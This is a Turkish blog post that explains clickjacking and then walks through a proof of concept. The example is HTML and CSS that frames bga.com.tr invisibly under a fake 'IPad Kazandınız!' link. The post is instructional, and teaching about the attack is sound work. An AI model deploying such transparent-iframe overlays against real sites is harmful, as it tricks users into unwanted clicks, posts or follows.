Clickjacking Nedir? Clickjacking Saldırısı Örneği

Deprecated: The PSR-0 `Requests_...` class names in the Requests library are deprecated. Switch to the PSR-4 `WpOrg\Requests\...` class names at your earliest convenience. in /home/u918363033/domains/berkeunal.com.tr/public_html/wp-includes/class-requests.php on line 24

Clickjacking Nedir; internet kullanıcılarının farkında olmadan tıklama yaptırmak için kullanılan bir gizli saldırı tekniğidir. Clickjacking farklı şekillerde oluşturulabilir en yaygın olan modeliyse bir frame’in transparan hale getirilerek asıl içeriğin üzerine eklenmesi ve kullanıcıyı bu alana tıklama zorunda bırakılması şeklinde gerçekleştirilir. Kullanıcılar bu transparan (renksiz ve görünmeyen) çerçeveye tıkladıkları anda ise Clickjacking işlemi tamamlanmış olur. Clickjacking saldırısı farklı amaçlar için kullanılabilir. Genellikle illegal içeriği bünyesinde barındıran internet siteleri tarafından kullanıcılardan fazladan gelir elde etmek amacıyla gizli pop-up reklamlara tıklama için kullanılır.

Clickjacking saldırısı oluşturmak için çok profesyonel olunmasına gerek yoktur. Her sistemin açığı olduğu gibi HTML gibi işaretleme dillerinin de sağladığı bazı özellikler açık olarak kullanılabilir. Clickjacking işlemi meydana getirilirken hazırlanan kod betiklerinin tümü HTML kodlarından ibarettir ve bu nedenle çoğunlukla internet tarayıcınız bu zafiyetin önüne geçmekte güçlük çekebilir.

Clickjacking saldırıları birkaç farklı HTML elementi ve Iframe’in bir arada kullanılmasıyla meydana gelir. Saldırganlar hazırladıkları tehlikeli kodları farklı bir sitede bulundururken bu iframe’i hedef site içerisine yerleştirirler.

Clickjacking saldırganları bu görünmez iframe penceresine tıklama sağlamak için çeşitli kurnazlıklar uygulayabilirler. Bazı saldırganlar içeriğe ulaşmak için tıklamanız gereken bir butonun önüne bu iframe penceresini yerleştirirken bazı saldırganlarda sayfanın %70’ini kaplayacak büyüklükte görünmez bir iframe ile sizi tuzağa düşürmeye çalışabilirler.

Bu zararlı iframe pencereleri sayesinde;

• Flash kullanarak web kameranızı ve mikrofonunuzu aktif hale getirebilirler.
• Sosyal medya hesaplarınız üzerinden haberiniz olmadan paylaşım yapabilirler.
• Tanımadığınız hesap veya kişileri takip etmenizi sağlayabilirler.
• Ekranınızda istenmeyen reklamları görüntüleyebilirler.

Clickjacking Saldırıları Örnek Uygulama (BGA)

Örnek olarak, tuzak sayfaya giren veya yönlendirilen bir kullanıcının “IPad Kazandınız!” linkine tıkladığını düşünürken bga.com.tr’deki hakkımızda linkine tıkladığı bir clickjacking sayfası hazırlanmıştır. İlk adımda sadece bga.com.tr sayfasını iframe nesnesine yükleyen bir sayfa oluşturulur.

<html>
<head>
<meta charset=”utf-8″ />
<title> Tuzak Sayfa </title>
</head>
<body>
<iframe src=”http://www.bga.com.tr/”></iframe>
</body>
</html>

İkinci adımda body tagları arasına, içinde z-index değeri -1 olan “IPad Kazandınız!” linki bulunan bir div eklenir.

<div><a href=”#” target=”_blank” style=”position:relative;z-index:-1″>IPad Kazandınız!</a></div>

Son adımda iframein şeffaflık değeri ve divin pozisyonu ayarlanır. Bunun için şu css kullanılmıştır. (head tagları arasına eklenmiştir)

<style>iframe {
width:100%;
height:100%;
position:absolute;
top:0; left:0;
filter:alpha(opacity=0.0);
opacity:0.0; }div {position:absolute;
top:113px;
right:240px;}</style>

Pozisyonu ayarlama aşamasında opacity değeri 0.5 gibi görülebilir bir değer yapılarak çalışılabilir.

Clickjacking Örnek Uygulama Yazar: Onur ALANBEL